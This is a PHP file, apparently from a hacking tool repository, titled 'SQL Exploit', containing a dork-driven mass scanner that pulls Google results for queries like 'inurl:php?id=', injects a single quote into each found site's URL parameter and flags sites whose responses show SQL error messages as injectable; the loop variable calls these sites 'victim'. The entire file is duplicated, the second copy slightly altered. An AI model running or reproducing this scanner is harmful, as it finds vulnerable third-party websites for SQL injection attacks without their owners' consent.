MesterFri/SQLi.php

## SQLi.php
<!--
##############
#     MesterFri     #
##############
//-->


<?php
            set_time_limit(0);
            ini_set('memory_limit', '64M');
            header('Content-Type: text/html; charset=UTF-8');

            /* Errors Dork*/
            $error[] = 'You have an error in your SQL';
            $error[] = 'supplied argument is not a valid MySQL result resource in';
            $error[] = 'Division by zero in';
            $error[] = 'Call to a member function';
            $error[] = 'Microsoft JET Database';
            $error[] = 'ODBC Microsoft Access Driver';
            $error[] = 'Microsoft OLE DB Provider for SQL Server';
            $error[] = 'Unclosed quotation mark';
            $error[] = 'Microsoft OLE DB Provider for Oracle';
            $error[] = 'Incorrect syntax near';
            $error[] = 'SQL query failed';
            $error[] = 'Warning mysql_fetch_assoc()';
            $error[] = 'Warning mysql_fetch_array()';
            $error[] = 'Warning session_start()';
            $error[] = 'Warning getimagesize()';
            $error[] = 'Warning is_writable()';
            $error[] = 'Warning getimagesize()';
            $error[] = 'Warning Unknown()';
            $error[] = 'Warning mysql_result()';
            $error[] = 'Warning pg_exec()';
            $error[] = 'Warning mysql_result()';
            $error[] = 'Warning mysql_num_rows()';
            $error[] = 'Warning mysql_query()';
            $error[] = 'Warning array_merge()';
            $error[] = 'Warning preg_match()';
            $error[] = 'Warning filesize()';
            $error[] = 'Warning require()';


            function letItBy(){ ob_flush(); flush(); }

            function google_that($query, $page=1){

                    $resultPerPage=8; //max result per page is 8 (GOOGLE rules)

                    $start = $page*$resultPerPage;

                    $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);

                    /* Get result */
                    $resultFromGoogle = json_decode( http_get($url, true) ,true);

                    /* Check result */
                    if(isset($resultFromGoogle['responseStatus'])){

     /* Check response status */
                            if($resultFromGoogle['responseStatus'] != '200') return false; //die( 'The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $resultFromGoogle['responseDetails'] . '<br>' .$url );

               /* Count results */
                            if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; //if no results return false
                            else return $resultFromGoogle['responseData']['results']; //return the results
                    }
                    /*
                            if this function kill the script, go to --> http://code.google.com/intl/iw/apis/websearch/docs/ AND LEARN!!
                    */
                    else
                            die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );

            }

            function http_get($url, $safemode = false){
                    if($safemode === true) sleep(1); // safe mode, i dont want GOOGLE ban me..
                    $im = curl_init($url);
                    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
                    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($im, CURLOPT_HEADER, 0);
                    return curl_exec($im);
                    curl_close();
            }

            function check_injection($url){
                    $data = http_get( str_replace("=", "='", $url) );
                    $errors = implode("|", $GLOBALS['error']);
                    return preg_match("#{$errors}#i", $data);
            }

    ?>
    <!DOCTYPE html>
    <html>
            <head>
                    <meta name="Content-Type" content="text/html; charset=UTF-8">
          <title>SQL Exploit</title>
                    <style type="text/css">
                            body{ background-color:black ; font: normal 5px Times New Roman; color:red;}
                            input{ border-width:5px; padding:8px; width:300px; }
                            a{ text-decoration:none; color:black;}
                            #button{ width:63px;}
                            #result{margin:20px;}
                            #result span{display:block;}
                            #result .Y{background-color:blue;}
                            #result .X{background-color:;}
                    </style>

            </head>
            <body>

<style>
body{
    font-family: "Times New Roman", cursive;
    background-color: #000000;
    text-shadow:0px 0px 1px #FF0000;
}
table{
    border: 1px #FF0000;
}
input,select,textarea{
    border: 1px #00ff00 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
</style>

<center><h1><font color="Lime" face="Times New Roman" size="+4">F</font><font color="Lime" face="Times New Roman" size="+2">ri&nbsp;</font><font color="Lime" face="Times New Roman" size="+4">&nbsp;-&nbsp;D</font><font color="Lime" face="Times New Roman" size="+2">ork&nbsp;</font><font color="lime" face="Times New Roman" size="+4">E</font><font color="lime" face="Times New Roman" size="+2">xploit</font><font color="blue" face="Times New Roman" size="+4">&nbsp;SQL</font><br><br>

               <center>     <form method="post">

                            <slect onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><!-- developed by Afla-Youssef Don't remove Copyright pleass -->


                            <input type="text" id="dork" name="dork" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:php?id='; ?>" />

<br>
                            <input type="submit" value="Start" id="button" style="background-color: black; color: blue; font-size: 15px; font-family:Times New Roman;" onclick="show_alert();"/>


    <script>
function show_alert()
{
   alert(" Exploit Dork Start ^_^");
}
</script>

                  </form></center>
                    <?php
                            if(isset($_POST['dork']{0})){

                                  echo '<div id="result"><center> Search... MesterFri</center><br>';
                                    letItBy();
                                    for($googlePage = 1; $googlePage <= 10000; $googlePage++){

                                         $googleResult = google_that($_POST['dork'], $googlePage);
                                            if(!$googleResult){
                                                    echo '<center>google dont heve more result, so I done..(?)</center>';
                                                    break;
                                            }

                                            for($victim = 0; $victim < sizeof($googleResult); $victim++){

                                                    if(check_injection($googleResult[$victim]['unescapedUrl'])){
                                                            echo '<span class="Y">';
                                                    //      file_put_contents("log.txt", "{$googleResult[$victim]['unescapedUrl']}\n");
                                                    }
                                                    else echo '<span class="X">';

                                                    echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a></span>\n";
                                                    letItBy();
                                            }
                                    }
                                    echo '</div>';
                            }
                    ?>
<center><font color="blue" face="Times New Roman" size="+2">M</font><font	color="blue" face="Times New Roman">ester</font><font color="blue" face="Times New Roman" size="+2">F</font><font	color="blue" face="Times New Roman">ri</font>
            </body>
    </html>
	<!--
	##############
	# MesterFri #
	##############
	//-->



	<?php
	set_time_limit(0);
	ini_set('memory_limit', '64M');
	header('Content-Type: text/html; charset=UTF-8');

	/* Errors Dork*/
	$error[] = 'You have an error in your SQL';
	$error[] = 'supplied argument is not a valid MySQL result resource in';
	$error[] = 'Division by zero in';
	$error[] = 'Call to a member function';
	$error[] = 'Microsoft JET Database';
	$error[] = 'ODBC Microsoft Access Driver';
	$error[] = 'Microsoft OLE DB Provider for SQL Server';
	$error[] = 'Unclosed quotation mark';
	$error[] = 'Microsoft OLE DB Provider for Oracle';
	$error[] = 'Incorrect syntax near';
	$error[] = 'SQL query failed';
	$error[] = 'Warning mysql_fetch_assoc()';
	$error[] = 'Warning mysql_fetch_array()';
	$error[] = 'Warning session_start()';
	$error[] = 'Warning getimagesize()';
	$error[] = 'Warning is_writable()';
	$error[] = 'Warning getimagesize()';
	$error[] = 'Warning Unknown()';
	$error[] = 'Warning mysql_result()';
	$error[] = 'Warning pg_exec()';
	$error[] = 'Warning mysql_result()';
	$error[] = 'Warning mysql_num_rows()';
	$error[] = 'Warning mysql_query()';
	$error[] = 'Warning array_merge()';
	$error[] = 'Warning preg_match()';
	$error[] = 'Warning filesize()';
	$error[] = 'Warning require()';


	function letItBy(){ ob_flush(); flush(); }

	function google_that($query, $page=1){

	$resultPerPage=8; //max result per page is 8 (GOOGLE rules)

	$start = $page*$resultPerPage;

	$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);

	/* Get result */
	$resultFromGoogle = json_decode( http_get($url, true) ,true);

	/* Check result */
	if(isset($resultFromGoogle['responseStatus'])){

	/* Check response status */
	if($resultFromGoogle['responseStatus'] != '200') return false; //die( 'The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $resultFromGoogle['responseDetails'] . '<br>' .$url );

	/* Count results */
	if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; //if no results return false
	else return $resultFromGoogle['responseData']['results']; //return the results
	}
	/*
	if this function kill the script, go to --> http://code.google.com/intl/iw/apis/websearch/docs/ AND LEARN!!
	*/
	else
	die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );

	}

	function http_get($url, $safemode = false){
	if($safemode === true) sleep(1); // safe mode, i dont want GOOGLE ban me..
	$im = curl_init($url);
	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($im, CURLOPT_HEADER, 0);
	return curl_exec($im);
	curl_close();
	}

	function check_injection($url){
	$data = http_get( str_replace("=", "='", $url) );
	$errors = implode("\|", $GLOBALS['error']);
	return preg_match("#{$errors}#i", $data);
	}

	?>
	<!DOCTYPE html>
	<html>
	<head>
	<meta name="Content-Type" content="text/html; charset=UTF-8">
	<title>SQL Exploit</title>
	<style type="text/css">
	body{ background-color:black ; font: normal 5px Times New Roman; color:red;}
	input{ border-width:5px; padding:8px; width:300px; }
	a{ text-decoration:none; color:black;}
	#button{ width:63px;}
	#result{margin:20px;}
	#result span{display:block;}
	#result .Y{background-color:blue;}
	#result .X{background-color:;}
	</style>

	</head>
	<body>

	<style>
	body{
	font-family: "Times New Roman", cursive;
	background-color: #000000;
	text-shadow:0px 0px 1px #FF0000;
	}
	table{
	border: 1px #FF0000;
	}
	input,select,textarea{
	border: 1px #00ff00 solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
	border-radius:5px;
	}
	</style>

	<center><h1><font color="Lime" face="Times New Roman" size="+4">F</font><font color="Lime" face="Times New Roman" size="+2">ri </font><font color="Lime" face="Times New Roman" size="+4"> - D</font><font color="Lime" face="Times New Roman" size="+2">ork </font><font color="lime" face="Times New Roman" size="+4">E</font><font color="lime" face="Times New Roman" size="+2">xploit</font><font color="blue" face="Times New Roman" size="+4"> SQL</font><br><br>

	<center> <form method="post">

	<slect onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><!-- developed by Afla-Youssef Don't remove Copyright pleass -->


	<input type="text" id="dork" name="dork" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:php?id='; ?>" />

	<br>
	<input type="submit" value="Start" id="button" style="background-color: black; color: blue; font-size: 15px; font-family:Times New Roman;" onclick="show_alert();"/>



	<script>
	function show_alert()
	{
	alert(" Exploit Dork Start ^_^");
	}
	</script>

	</form></center>
	<?php
	if(isset($_POST['dork']{0})){

	echo '<div id="result"><center> Search... MesterFri</center><br>';
	letItBy();
	for($googlePage = 1; $googlePage <= 10000; $googlePage++){

	$googleResult = google_that($_POST['dork'], $googlePage);
	if(!$googleResult){
	echo '<center>google dont heve more result, so I done..(?)</center>';
	break;
	}

	for($victim = 0; $victim < sizeof($googleResult); $victim++){

	if(check_injection($googleResult[$victim]['unescapedUrl'])){
	echo '<span class="Y">';
	// file_put_contents("log.txt", "{$googleResult[$victim]['unescapedUrl']}\n");
	}
	else echo '<span class="X">';

	echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a></span>\n";
	letItBy();
	}
	}
	echo '</div>';
	}
	?>
	<center><font color="blue" face="Times New Roman" size="+2">M</font><font color="blue" face="Times New Roman">ester</font><font color="blue" face="Times New Roman" size="+2">F</font><font color="blue" face="Times New Roman">ri</font>
	</body>
	</html>